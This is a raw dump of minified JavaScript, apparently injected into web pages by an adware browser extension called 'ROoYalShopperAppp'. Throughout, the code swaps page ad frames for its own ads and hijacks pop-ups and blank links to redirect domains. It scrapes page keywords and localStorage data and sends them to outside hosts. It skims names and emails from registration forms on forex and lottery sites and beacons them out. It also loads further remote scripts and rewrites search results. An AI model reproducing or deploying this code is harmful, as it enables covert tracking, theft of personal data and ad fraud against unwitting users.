Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='<iframe src=\"//ads.ventivmedia.com/www/delivery/afr.php?zoneid=31&cb='+Math.random()+'\" style=\"width:728px;height:90px\" frameborder=\"0\" scrolling=\"no\"></iframe>';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();})()}else{(function(){var stngs = {attr_name:'s1301266267699183854',szy_domain:[\"senddownloadmy.com\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13]],checkif:function(ifr){return (ifr.getAttribute('s1301266267699183854') || ifr.src.indexOf('=506761')>-1||ifr.src.indexOf('=564350')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/âp\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"1\",eid:\"892\",hid:\"1301266267699183854\",lt:\"7.25\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"wLXWXSer\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if(c)for(var b=0,d=c.length;b<d;b++)\"keywords\"!=c[b].name.toLowerCase()&&\"description\"!=c[b].name.toLowerCase()||(a+=\" \"+c[b].content.replace(/,/g,\" \"));if(b=document.getElementsByTagName(\"a\")){c={};for(d=0;d<b.length;d++)try{var e=b[d].innerText;\"undefined\"==typeof e&&(e=b[d].textContent);for(var f=e.toLowerCase().split(/[\\s,-]/g),h=0;h<f.length;h++)4>f[h].length||(c[f[h]]?c[f[h]]++:\nc[f[h]]=1)}catch(k){}var e=[],g;for(g in c)e.push([g,c[g]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(g=0;g<e.length;g++)a+=\" \"+e[g][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)},init:function(){var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var c=[],b=0;b<a.length;b++)stngs.checkif(a[b])||

(a[b].setAttribute(adzy653rk.imp.rattr,\"true\"),a[b].setAttribute(\"replaced\",\"true\"),c.push(a[b]));if(c.length){var d=function(a){if(a>=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?\nadzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"&lt=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},\ndfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var c=function(b){b>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[b]&&adzy653rk.ifr[b]&&adzy653rk.ifr[b].src!=adzy653rk.src[b][0]&&(adzy653rk.ifr[b].nextSibling.innerHTML&&adzy653rk.ifr[b].nextSibling.innerHTML.match(/<span[^>]?>Ads( not)? by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=1301266267699183854&eid=892&pid=1&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src):\n((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=1301266267699183854&eid=892&pid=1&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src),adzy653rk.ifrset(adzy653rk.ifr[b],adzy653rk.src[b][1],1))),setTimeout(function(){c(++b)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==\ntypeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b<c.length;b++)if(a[0]>=c[b][0]-5&&a[0]<=c[b][0]+5&&a[1]>=c[b][1]-5&&a[1]<=c[b][1]+5)return c[b][2];return!1},getAds:function(a,c){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var b=document.createElement(\"script\");b.type=\"text/javascript\";b.src=a+\"&cb=adzy653rk.\"+c;b.onreadystatechange=\nb.onload=function(){try{b.parentNode.removeChild(b)}catch(a){}};try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild(b)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[c](e.response)};e.send(null)}},seta:function(a){var c=null;try{var b=adzy653rk.l.decode(a);\"undefined\"!=typeof JSON&&JSON.parse?c=JSON.parse(b):eval(\"ifrl = \"+b)}catch(d){}if(c&&c.length)for(a=\n0;a<c.length;a++)c[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],c[a]);adzy653rk.destruct()},ifrset:function(a,c,b){b||(adzy653rk.ifr.push(a),c[0]=c[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(c[1]){case 1:a.src=c[0]+(-1<c[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+c[2]+\"_18x18_0\":\"\");break;case 2:a.src=\"about:blank\";\ntry{a.contentWindow.document.write(d[0]+'<iframe src=\"'+c[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[Â-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b<a.length;){var d=this.xlat.indexOf(a.charAt(b++)),\ne=this.xlat.indexOf(a.charAt(b++)),f=this.xlat.indexOf(a.charAt(b++)),h=this.xlat.indexOf(a.charAt(b++)),k=(e&15)<<4|f>>2,g=(f&3)<<6|h,c=c+String.fromCharCode(d<<2|e>>4);64!

=f&&0<k&&(c+=String.fromCharCode(k));64!=h&&0<g&&(c+=String.fromCharCode(g))}returnthis._utf8_decode(c)},_utf8_decode:function(a){for(var c=\"\",b=0;b<a.length;){var d=a.charCodeAt(b);if(128>d)c+=String.fromCharCode(d),b++;else if(191<d&&224>d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+\n1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 &&adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"optimizedby.brealtime.com ads.mangomediaads.com www.adshost2.com s-tag.z5x.net ad.z5x.net exchange.admailtiser.com ads.geverads.com 12ads.computerapproval.com ad.yieldmanager.com creative.rev2pub.com ad.adserverplus.com servedby.adxplosions.com cdn.trkclk.net n103adserv.com srv.aileronx.com ads.ventivmedia.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com srv1.statisticsreporting.com advs.adgorithms.com ads.ad-maven.com ad.adnetwork.net ads.incmd03.com ads.mediawhite.com Servedby.bigfineads.com a.ad-sys.com ads.yahoo.com tala.intlsources.com an.z5x.net c5.zedo.com ib.adnxs.com ad.jumbaexchange.com tr.adsplats.com ads.sonobi.com fw.adsafeprotected.com ad.improvemedianetwork.com media.glispa.com\".indexOf(window.self.location.hostname)==-1 &&adzy653rk.location.indexOf(\"zoneid=506761\")==-1 &&adzy653rk.location.indexOf(\"zoneid=564350\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 &&adzy653rk.location.indexOf(\"1018-1005\")==-1 &&adzy653rk.location.indexOf(\"1019-1001\")==-1 &&adzy653rk.location.indexOf(\"PT1312\")==-1)adzy653rk.init()})()};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"wLXWXSer=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"wLXWXSer=\")){var d=a.match(/wLXWXSer=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8dichVWzmPhd95pjsMCyVUojwMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rjrErjs7qTs7qHg4pjw5rHY8qa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{if(window.opener&&window.self==window.top&&(!window.name.match(/^(a652c|ld893)_/))&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&-1==document.referrer.indexOf('/sd/dw32.html')&&-1==document.referrer.indexOf('/pop/1.1.00')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-

1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/sd/dw32.html')&&-1==window.self.location.href.indexOf('/pop/1.1.00')&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://superiends.org/z/?f=pdnKrTs6vTw4rG56qV1FqdwErTaEqHnE&eid=892&hid=1301266267699183854&pid=1&rf=\"+ encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://superiends.org/x/?f=pdnKrTs6vTw4rG56qV1FqdwErTaEqHnE&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://superiends.org/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://superiends.org/x/?f=pdnKrTs6vTw4rG56qV1FqdwErTaEqHnE&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://superiends.org/x/?f=pdnKrTs6vTw4rG56qV1FqdwErTaEqHnE&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://superiends.org/z/?

f=pdnKrTs6vTw4rG56qV1FqdwErTaEqHnE&eid=892&hid=1301266267699183854&pid=1&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\.@]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=pdnKrTs6vTw4rG56qV1FqdwErTaEqHnE&eid=892&hid=1301266267699183854&pid=1&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();(function(){var g=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},h=function(){var a=document.getElementsByClassName(\"watch-view-count\");return

a&&a[0]&&a[0].innerHTML?a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\")||0:0},k=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(varb=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children[b].getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},l=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");if(a&&a[1]&&a[1].innerHTML)return(a=a[1].innerHTML.replace(/[^0-9]/g,\"\"))||0;if(a&&a[0]&&a[0].innerHTML||(a=document.getElementsByClassName(\"_mov\"))&&a[0]&&a[0].innerHTML)return(a=a[0].innerHTML.replace(/[^0-9]/g,\"\"))||0};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{var e=document.getElementsByTagName(\"body\")[0];if(!e.getAttribute(\"wyttb\")){e.setAttribute(\"wyttb\",\"1\");var f=g(),d=h(),m=k(),n=l();f&&d&&d&&((new Image).src=\"https://score.transferin.in/v.php?id=\"+f+\"&n=\"+d+\"&c=\"+m+\"&s=\"+n+\"&cb=84.227.193.76\")}}catch(p){}})();;new function(){if(!document.getElementById(\"id_a65d4a24eac28ce92\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//cdncache-a.akamaihd.net/sub/ubb4ad5/892_1/l.js?pid=1750&ext=ROoYalShopperAppp&systemid=1301266267699183854\";a.setAttribute(\"id\",\"id_a65d4a24eac28ce92\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;(function(){try{if(!document.getElementById(\"asdasdfdhggfhjhl45646\")&&window.top==window.self&&(!window.name.match(/^(a652c|ld893)_/))){var a=document.createElement(\"script\");a.id=\"asdasdfdhggfhjhl45646_rvz\";a.type=\"text/javascript\";a.textContent=\"window._rvz1017x1005 = {publisher_subid: '892_1',addonname: 'ROoYalShopperAppp'};\";document.getElementsByTagName(\"head\")[0].appendChild(a);var b=document.createElement(\"script\");b.src=\"//asrv-a.akamaihd.net/sd/1017/1005.js\";b.setAttribute(\"id\",\"asdasdfdhggfhjhl45646\");document.getElementsByTagName(\"head\")[0].appendChild(b)}}catch(c){}})();;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5.p\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"ROoYalShopperAppp\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g= g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function()

{4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g= a.query_selector_all(c);clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(c){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=a.dhtml_prop_name(b);return\"object\"==typeof c.currentStyle&&null!=c.currentStyle&&\"undefined\"!=typeof c.currentStyle[b]?c.currentStyle[b]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}: function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()}; a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=1301266267699183854&eid=892&pid=1&prodid=316&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CH&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var

k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else 